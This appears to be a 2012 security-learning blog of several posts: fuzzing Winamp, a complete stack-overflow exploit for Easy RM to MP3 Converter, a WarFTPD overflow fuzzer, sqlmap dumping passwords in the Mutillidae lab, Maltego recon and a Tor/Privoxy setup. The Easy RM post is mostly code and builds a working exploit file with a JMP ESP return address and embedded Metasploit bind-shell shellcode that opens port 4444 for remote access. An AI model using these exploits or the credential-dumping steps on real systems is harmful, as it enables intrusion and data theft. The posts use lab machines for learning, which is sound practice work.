Thursday, 27 September 2012

EXPLOIT WINAMP MUSIC PLAYER (SEH)

This time I try to exploit Winamp v5.572 and make it crash.


Since yesterday I have not found the right fuzzer to make it crash.
I tried to write a fuzzer script that builds a .swf file; after running the fuzzer to generate the .swf file, I open that file in Winamp.

#!/usr/bin/python
# Python 2: str literals are raw bytes, so "\x41" writes the byte 0x41 ('A')
buffer = "\x41" * 700          # 700 'A' bytes, no valid SWF header at all
filename = "tets.swf"
f = open(filename, "wb")       # binary mode so nothing gets translated on write
f.write(buffer)
print("sukses gawe file")
f.close()

And what happens??? Winamp crashed.


When I run Winamp under OllyDbg, I don't see the junk data that I sent.

But I do see a difference before and after I run the fuzzer. Notice the pictures below:

Before


After




So far I'm still confused, and I'll keep trying to exploit this application. TRY HARDER !!!



PRAY FOR ME 



Tuesday, 25 September 2012

STACK OVERFLOW EASY RM TO MP3 CONVERTER (NON SEH)

This time I will explore how to exploit Easy RM to MP3 Converter.
You need to know that this is a non-SEH exploit. You can look up the meaning of SEH on the internet or anywhere else.

Ok let's begin

1. First we need OllyDbg and Easy RM to MP3 Converter to start the exploitation.

Install and run them on Windows in VirtualBox.

2. Then we need Python or something similar to write a fuzzer for the exploit.
I use Python to write the fuzzer.

I write the fuzzer like this:


#!/usr/bin/python
# Python 2: str literals are raw bytes
buffer = "http://" + "\x41" * 28000   # a URL prefix followed by 28000 'A' bytes
filename = "pusing1.ram"
f = open(filename, "wb")               # write the playlist file in binary mode
f.write(buffer)
print("sukses gawe file")
f.close()

This means I send 28000 bytes of junk, and the output file is pusing1.ram.
Save it to your directory, then run the fuzzer from the BackTrack console.
In this case I saved the fuzzer in a shared-folder directory to make the file easy to access.



As we can see, once the fuzzer is run it generates output. Look at the picture below: pusing1.ram is the output.


3. Run Easy Converter under OllyDbg and load the output file 'pusing1.ram' into Easy Converter.
See what happens in OllyDbg: the CPU registers window shows an error / crash.


4. Now that we know the application crashes with 28000 bytes, we generate a 28000-byte pattern using pattern_create.rb and copy-paste it into the fuzzer.


5. Rerun the fuzzer and see what happens in the CPU registers: the EIP value changes to 326D4831.


Then we calculate at which offset it crashes using pattern_offset.rb.


EIP is hit at offsets 5825 and 26105, ESP at offsets 5833 and 26113.
I tried 5825 first, but it did not cause a crash; then I used 26105, and that really did crash.

buffer="http://"+"\x90" * 26105     # 26105 filler bytes reach the saved return address
buffer+="\xEF\xBE\xAD\xDE"          # 0xDEADBEEF in little-endian order, to prove we control EIP


The EIP value changes to DEADBEEF.

Then I add the ESP part to the fuzzer:

buffer="http://"+"\x90" * 26105
buffer+="\xEF\xBE\xAD\xDE"
buffer+="http://"+"\x90" * (26113-len(buffer))   # meant to pad to the ESP offset 26113; the buffer is already 26116 bytes, so only "http://" is appended
buffer+="http://"+"\xCC" * (28000-len(buffer))   # fill the rest, where ESP points, with \xCC (INT 3) up to 28000 bytes

Rerun the fuzzer and you will see:


The stack window in OllyDbg contains junk data in the form of the character \xCC.


6. After that, following the exploitation strategy, we look for a JMP ESP.
Run the application under OllyDbg. On the View menu select the Executable modules submenu.


Double-click SHELL32.dll, then search for JMP ESP.


We find an address in shell32.dll that contains a JMP ESP instruction.

The resulting address is 7C9D30D7. We make the fuzzer set the EIP register to the address of that JMP ESP inside shell32.dll.
First we must convert the address to little-endian format, from 7C9D30D7 to \xD7\x30\x9D\x7C.
So the fuzzer is:

buffer="http://"+"\x90" * 26105
buffer+="\xD7\x30\x9D\x7C"                       # 7C9D30D7 (JMP ESP in shell32.dll) in little-endian order
buffer+="http://"+"\x90" * (26113-len(buffer))   # as before, this only appends "http://" because the buffer is already 26116 bytes
buffer+="http://"+"\xCC" * (28000-len(buffer))   # \xCC filler where ESP points

Then set a breakpoint at address 7C9D30D7.
Run Easy Converter under OllyDbg and rerun the fuzzer. See what happens:


In the CPU registers we find SHELL32.7C9D30D7 right next to the EIP value. OllyDbg breaks at 7C9D30D7.

7. The last step is to generate the payload with the Metasploit Framework. Choose the Win32 bind shell, enter the data as in the picture below, and click the Generate button.


Copy-paste the payload into the fuzzer:


#!/usr/bin/python
# Python 2: str literals are raw bytes
buffer="http://"+"\x90" * 26105              # filler up to the saved return address
buffer+="\xD7\x30\x9D\x7C"                   # 7C9D30D7 = JMP ESP in shell32.dll, little endian
#buffer+="http://"+"\x90" * (26113-len(buffer))
#buffer+="http://"+"\xCC" * (28000-len(buffer)) 
buffer+="\x90" * 32                          # short NOP sled at ESP, where the JMP ESP lands
# payload generated by the Metasploit Framework (Win32 bind shell, listening on port 4444):
buffer+= ("\xdd\xc3\x31\xc9\xd9\x74\x24\xf4\x5b\xb1\x51\xbf\xa1\x1a\xa8\x27"
"\x83\xc3\x04\x31\x7b\x13\x03\xda\x09\x4a\xd2\xe0\x44\x61\x50\xf0"
"\x60\x8a\x94\xff\xf3\xfe\x07\xdb\xd7\x8b\x9d\x1f\x93\xf0\x18\x27"
"\xa2\xe7\xa8\x98\xbc\x7c\xf1\x06\xbc\x69\x47\xcd\x8a\xe6\x59\x3f"
"\xc3\x38\xc0\x13\xa0\x79\x87\x6c\x68\xb3\x65\x73\xa8\xaf\x82\x48"
"\x78\x14\x43\xdb\x65\xdf\xcc\x07\x67\x0b\x94\xcc\x6b\x80\xd2\x8d"
"\x6f\x17\x0e\x32\xbc\x9c\x59\x58\x98\xbe\x38\x63\xd1\x65\xde\xe8"
"\x51\xaa\x94\xae\x59\x41\xda\x32\xcf\xde\x5b\x42\x51\x89\xd5\x1c"
"\x63\xa5\xba\x5f\xad\x53\x68\xf9\x3a\xaf\xbc\x6d\xcc\xbc\xf2\x32"
"\x66\xbc\x23\xa4\x4d\xaf\x38\x0f\x02\xcf\x17\x30\x2b\xca\xfe\x4f"
"\xc6\x1d\xfd\x1a\x73\x1c\xfe\x74\xeb\xf9\x09\x81\x41\xae\xf6\xbf"
"\xc9\x02\x5a\x6c\xbd\xe7\x0f\xd1\x12\x17\x7f\xb3\xfc\xf6\xdc\x5d"
"\xae\x71\x3d\x34\x38\x26\xa4\x46\x7e\x71\x26\x70\xea\x6e\x89\x29"
"\x14\x5e\x41\x75\x47\x71\x7b\x22\x67\x58\x28\x99\x68\xb5\xa7\xc4"
"\xde\xb0\x71\x51\x1e\x6a\xd1\x09\xb4\xc6\x2d\x61\xa7\x81\x36\xf8"
"\x0e\x28\xee\x05\x58\x9e\xef\x29\x03\x4b\x74\xaf\xa4\xe8\x19\xa6"
"\xd0\x85\xb1\xe1\x33\x96\xbb\xf6\x2e\x62\x35\x1a\x9f\xaa\xb6\x70"
"\x1e\x68\x14\x7a\x9d\x41\xf5\x0f\x58\xa2\x52\xa4\x36\xba\xd6\x44"
"\xfb\x2d\xe8\xcd\xb8\xae\xc0\x76\x16\x03\xbc\xd9\xc9\xc9\x3f\x88"
"\xb8\x58\x11\xd5\xeb\x0b\x3c\xf0\x09\x02\x6d\xfd\xc4\xf0\x6d\xfe"
"\xde\xfb\x42\x8b\x76\xf8\xe0\x4f\x1c\xff\x31\x1d\x22\x2f\xd5\xdf"
"\x04\x32\x55\x4c\x4a\x65\x65\xa2")
filename="pusing6.ram"
f=open(filename, "wb")                       # binary mode keeps every payload byte as-is
f.write(buffer)
print("sukses gawe file")
f.close()


Run Easy Converter without OllyDbg, then open / load the fuzzer file.


Wawwww, Easy Converter has crashed.

After running the fuzzer file, use telnet to connect to the Windows XP system on port 4444.


You can see what happens....




CMIIW


Tuesday, 18 September 2012

BUFFER OVERFLOW : WARFTPD (APPLICATION NON SEH)

1. Install and run WarFTPD on Windows in VirtualBox.


2. Then write a simple fuzzer in the Python programming language and save it with the .py extension on BackTrack.
I saved it on BackTrack as xfuzz.py.

fuzzer script :


#!/usr/bin/python
import socket

buffer = "\x41" * 1000                      # 1000 'A' bytes sent as the FTP user name
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.43.128', 21))           # WarFTPD running in the VirtualBox VM
data = s.recv(1024)                         # read the FTP banner
print("sending evile data via user comand...")
s.send('USER ' + buffer + '\r\n')
data = s.recv(1024)
s.send('PASS PASSWORD ' + '\r\n')
s.close()
print("Finish")

Warning: whitespace is very significant in the Python language.


3. To run the WarFTP server choose Properties > Start Service; the status of WarFTP will then be Idle.

I tried to connect to the FTP service using nc; if it succeeds you will see something like the picture below.


Then I tried to run the fuzzer from the BackTrack console.


Watch WarFTP: if the fuzzer succeeds in making the application crash, WarFTP will disappear from the screen by itself.

Every time you fuzz WarFTP, the application crashes and its configuration is saved to the file FtpDaemon.dat.
To re-run the WarFTP server and prevent error messages, delete the file FtpDaemon.dat.

4. Re-run the WarFTP server and add a dummy user via User Security Properties.

Then run OllyDbg to debug the WarFTP server.

After adding the new user, repeat the fuzzing. This time WarFTPD does not display an error message.

Then run WarFTP under OllyDbg and re-run the fuzzer.

before fuzzer


after fuzzer


We can clearly see what happens to the CPU registers when the crash occurs.
Four registers are affected by the fuzzer: ESP, EDI, EBP, and EIP.

5. Pattern create
One of the tools in Metasploit that can be used in exploit development is pattern_create.
Its purpose is to find the exact location of a string within the data the fuzzer sends to the application.

In the console, go to the folder /pentest/exploits/framework/tools.

To produce a thousand bytes of pattern data, run this command:
 ./pattern_create.rb 1000 > string_pattern.txt

It is saved as string_pattern.txt.


Open string_pattern.txt, copy the pattern, and put it into xfuzz.py as the buffer.

Then run the fuzzer against WarFTP again and note the registers of the WarFTP server.


6. Pattern offset
This tool calculates how many bytes into the pattern generated by pattern_create.rb a given value appears.


We see that 485 bytes of data are needed to reach the EIP register.

Add this code to the xfuzz.py script:
buffer = "\x90" * 485

Run the fuzzer against WarFTP once more and note the EIP register.


We can see that the EIP register changes to DEADBEEF.

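Both this WarFTP post (485 bytes in a 1000-byte pattern) and the Easy RM to MP3 post above (EIP 326D4831 found at offsets 5825 and 26105 in a 28000-byte pattern) rely on pattern_create.rb and pattern_offset.rb. The Python 3 block below is an added example, my own re-implementation of that scheme rather than Metasploit's code; it also shows why the 28000-byte run gave two candidates: the pattern repeats every 20280 bytes, and 26105 - 5825 is exactly that period.

```python
import itertools
import string
import struct

UPPER, LOWER, DIGITS = string.ascii_uppercase, string.ascii_lowercase, string.digits
# One full cycle of the pattern: 26 * 26 * 10 triplets of 3 bytes = 20280 bytes.
PERIOD = len(UPPER) * len(LOWER) * len(DIGITS) * 3


def pattern_create(length):
    """`length` bytes of the cyclic 'Aa0Aa1Aa2...' pattern (pattern_create.rb scheme).
    Past PERIOD bytes the sequence simply starts again at 'Aa0'."""
    triplets = itertools.cycle("".join(t) for t in itertools.product(UPPER, LOWER, DIGITS))
    return "".join(itertools.islice(triplets, (length + 2) // 3))[:length].encode("ascii")

def register_to_bytes(value):
    """Pack a 32-bit register value as it lies in memory on x86 (little endian):
    EIP 0x326D4831 becomes b'1Hm2', and 0x7C9D30D7 becomes the bytes D7 30 9D 7C."""
    return struct.pack("<I", value)

def pattern_offsets(register_value, length):
    """Every offset in a `length`-byte pattern whose 4 bytes form `register_value`
    (what pattern_offset.rb prints). Two hits mean the buffer was longer than PERIOD,
    so the pattern wrapped and the same 4 bytes occur twice."""
    needle, hay = register_to_bytes(register_value), pattern_create(length)
    hits, pos = [], hay.find(needle)
    while pos != -1:
        hits.append(pos)
        pos = hay.find(needle, pos + 1)
    return hits

def explain_hits(hits):
    """Triage note for a pattern_offsets() result."""
    if not hits:
        return "value not found in the pattern (EIP may hold something else)"
    if len(hits) == 1:
        return "unique offset %d" % hits[0]
    if all(b - a == PERIOD for a, b in zip(hits, hits[1:])):
        return ("candidates %s differ by the pattern period (%d bytes); confirm each "
                "with a marker such as DEADBEEF, as the post does" % (hits, PERIOD))
    return "candidates %s" % hits


if __name__ == "__main__":
    hits = pattern_offsets(0x326D4831, 28000)       # Easy RM to MP3 crash: [5825, 26105]
    print(hits, explain_hits(hits))
    eip = int.from_bytes(pattern_create(1000)[485:489], "little")   # WarFTP: bytes at 485
    print(pattern_offsets(eip, 1000))                # [485]
```

A buffer no longer than one period (20280 bytes) always yields a single offset; with a longer one, check each candidate with a marker as the post does.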

TO BE CONTINUED...


Monday, 17 September 2012

SQL INJECTION BYPASS : MUTILLIDAE

1. First start Apache and MySQL.

2. Open Mutillidae by typing localhost/mutillidae in the browser.

3. Set your browser's proxy to localhost port 8080.


4. Open Burp Suite and set the target to localhost.

Then look at what happens when we click the login button in Mutillidae. Burp Suite successfully intercepts Mutillidae's activity. See the picture below:


This is the result of the interception: you can see information such as the POST request to localhost, including the username and password fields of the POST body.


5. Next open sqlmap and test it to identify the backend database.


As a result we get some databases:


6. We got some databases; I tried to get the tables from the database nowasp.


And the result


7. Then I try to get the columns of the table accounts.


result :


8. Finally we get the columns from the accounts table; then I'll try to dump the usernames.


As the result:


Dump the passwords:


9. In the last step I'll go into the MySQL shell.

Type: # mysql -h [host] -u user -p


I got it !!!


CMIIW


Friday, 14 September 2012

INFORMATION GATHERING USING MALTEGO

To use Maltego we need to register first.

After registering, open Maltego and you will see the main Maltego display.


Then drag an entity from the Palette panel, for example DNS. I entered is2c-dojo.com as the DNS name.

Run the transforms and you will get information such as associated websites and their relationships.

This is some of the information you will get:


Additionally I use the whois tool to add other information, i.e. DNS, server update date, telephone number, etc.


CMIIW


INSTALL TOR AND PRIVOXY ON LINUX


Installation of Tor and Privoxy


You will first need to add the repository from which you wish to install Tor and Privoxy. Open the /etc/apt/sources.list file with vi (or your preferred config editor):

vi /etc/apt/sources.list


Press the i (insert key), and add the following line:

deb http://deb.torproject.org/torproject.org lucid main


Press Esc to stop editing, then :wq [Enter] or ZZ (Shift+zz) to write the changes to the file and quit vi.

Run the following commands :
 

gpg --keyserver keys.gnupg.net --recv 886DDD89
gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | apt-key add -


During installation you will be asked whether you want to continue. If there are no strange warnings and it resembles this output, answer Y.

Run the following commands to install tor and privoxy:


apt-get update
apt-get install tor tor-geoipdb


apt-get install privoxy


Privoxy configuration


Open /etc/privoxy/config with vi (or your preferred config editor)


vi /etc/privoxy/config


Scroll down. In section 4.1, check that the listen address is 127.0.0.1:8118


If it is not, change it by pressing A (Shift+a) or i (or any other way to enter insert mode), making the necessary changes, and pressing Esc when you are done. Scroll down further to section 5.

When using socks5 on port 9050, your application is giving Tor only an IP address. Applications that do DNS resolves themselves may leak information, so using SOCKS4A instead, which hands the hostname to Tor for resolution, is a good idea.

In section 5.2, set Privoxy to forward to Tor (do NOT forget the dot at the end):

forward-socks4a / 127.0.0.1:9050 .


The following two configuration changes are performance improvements.
In 6.4 change keep-alive-timeout 300 to keep-alive-timeout 600 and in 6.6 change socket-timeout 300 to socket-timeout 600:


Press Esc to stop editing, then :wq [Enter] or ZZ (Shift+zz) to write the changes to the file and quit vi.

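As an added example (not part of the original tutorial), a small Python 3 checker for the Privoxy settings edited above: the loopback-only listen address, the forward-socks4a line with its trailing dot, and the SOCKS4A-versus-SOCKS5 DNS point. The two sample configs are constructed here; the function only reads text and never touches /etc/privoxy/config.

```python
# Constructed samples: the lines this post edits, done right and done wrong.
GOOD_CONFIG = """\
listen-address  127.0.0.1:8118
forward-socks4a / 127.0.0.1:9050 .
keep-alive-timeout 600
socket-timeout 600
"""
BAD_CONFIG = """\
listen-address  0.0.0.0:8118
forward-socks5 / 127.0.0.1:9050
keep-alive-timeout 300
"""


def check_privoxy_config(text):
    """Findings for a Privoxy config; an empty list means it matches the post's setup:
    a loopback-only listener, everything forwarded to Tor via SOCKS4A so Tor does the
    DNS lookups, and no HTTP parent proxy (the trailing '.')."""
    findings, listen, forwards = [], [], []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()        # drop comments and blank lines
        if not line:
            continue
        key, *args = line.split()
        if key == "listen-address":
            listen.append(args[0] if args else "")
        elif key.startswith("forward-socks"):
            forwards.append((key, args))
    if not listen:
        findings.append("no listen-address: section 4.1 should set 127.0.0.1:8118")
    for addr in listen:
        if not addr.startswith("127.0.0.1:"):
            findings.append("listen-address %s accepts other hosts; use 127.0.0.1:8118" % addr)
    if not forwards:
        findings.append("no forward-socks line: nothing goes through Tor")
    for key, args in forwards:
        if key in ("forward-socks4", "forward-socks5"):
            findings.append("%s resolves DNS locally (possible leak); use forward-socks4a" % key)
        if len(args) < 3:
            findings.append("%s is missing the trailing '.' (no HTTP parent)" % key)
        if len(args) >= 2 and args[1] != "127.0.0.1:9050":
            findings.append("%s forwards to %s, not Tor's 127.0.0.1:9050" % (key, args[1]))
    return findings


if __name__ == "__main__":
    for name, cfg in (("good", GOOD_CONFIG), ("bad", BAD_CONFIG)):
        print(name, check_privoxy_config(cfg) or "ok")
```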

Starting (and stopping) privoxy


Run the command:

/etc/init.d/privoxy start



You can run the same command but then with "stop" instead of "start" if you wish to stop privoxy. If you do, and you have already configured clients, connections will be refused.


System wide configuration of clients


Configure your clients with IP address 127.0.0.1 and port 8118


Check that it's working:


https://check.torproject.org/


CMIIW